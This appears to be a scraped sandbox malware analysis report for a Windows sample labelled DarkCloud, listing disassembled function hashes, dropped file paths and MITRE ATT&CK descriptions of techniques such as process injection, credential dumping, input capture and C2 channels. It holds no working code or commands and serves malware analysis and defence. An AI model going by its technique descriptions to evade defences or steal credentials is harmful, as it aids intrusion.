$j@, xrefs: 00412BB3

Memory Dump Source

Source File: 0000000E.00000002.3286693348.0000000000412000.00000040.00000400.00020000.00000000.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_412000_LjlEiSlJe.jbxd

Similarity

API ID:
String ID: $j@$$j@$xj@$xj@
API String ID: 0-3430109894
Opcode ID: 6b1b8f6f83a0df533027231029633dc0d540c72b0a4b2aae37a41a3f9699a6c6
Instruction ID: ce8ea732833cc40ccd40573cdf0175db0f0605335fffe3333f267b8a5f7fcc92
Opcode Fuzzy Hash: 6b1b8f6f83a0df533027231029633dc0d540c72b0a4b2aae37a41a3f9699a6c6
Instruction Fuzzy Hash: 8912E774A10228DFDB24DF54DD84BEAB7B5BB45300F1081AAE40AB7264DB745AC9CF58

Function 0041B002 Relevance: 2.1, Strings: 1, Instructions: 862COMMON

Download Yara Rule

Strings

!, xrefs: 0041BD90

Memory Dump Source

Source File: 0000000E.00000002.3286693348.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_41b000_LjlEiSlJe.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-2657877971
Opcode ID: 2fc622a50f2f6cf3e5b6a67b8511a4ac6e1241f6c40786606c823cc457f69e90
Instruction ID: 2ddcbc6fc80b99670987109aced9ddd9bbf56537d09c1520597cf594c3a1e0f3
Opcode Fuzzy Hash: 2fc622a50f2f6cf3e5b6a67b8511a4ac6e1241f6c40786606c823cc457f69e90
Instruction Fuzzy Hash: 8192F67590012D9BCB25DF50DD98BDEB7B8FB48304F1081EAE54AA72A0DB345B86CF94

Non-executed Functions

Function 004457AE Relevance: 5.1, Strings: 4, Instructions: 125COMMON

Download Yara Rule

Strings

t@, xrefs: 0044581F, 004458CC
>, xrefs: 00445A84
\@, xrefs: 00445935
t@, xrefs: 00445949

Memory Dump Source

Source File: 0000000E.00000002.3286693348.0000000000442000.00000040.00000400.00020000.00000000.sdmp, Offset: 00442000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_442000_LjlEiSlJe.jbxd

Similarity

API ID:
String ID: >$\@$t@$t@
API String ID: 0-397992017
Opcode ID: bb7a4db89f580660ce7d9a5bc7201ad8e2089314ed79806aeae5a45fc9dfa9ff
Instruction ID: 13dae8a5215eeeec8a14e986a5156b9e6c0ed5cbf05ba9de4d5f6b9e7b4519f8
Opcode Fuzzy Hash: bb7a4db89f580660ce7d9a5bc7201ad8e2089314ed79806aeae5a45fc9dfa9ff
Instruction Fuzzy Hash: 0251E6B4900219CFDB24CF55C949BD9B7B4BF48300F00C1EAE54AAB261E7B49E85DF94

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report yMvZXcwN2OdoP6x.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DarkCloud

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LjlEiSlJe.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yMvZXcwN2OdoP6x.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\IXa08084

C:\Users\user\AppData\Local\Temp\OVa08016

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4xv1tfy4.ztf.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bbndha5n.lbn.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hjm32oau.myp.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4tb0rms.wty.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_obzzuwdw.i4c.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvq2jxys.qey.psm1

Windows Analysis Report
yMvZXcwN2OdoP6x.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre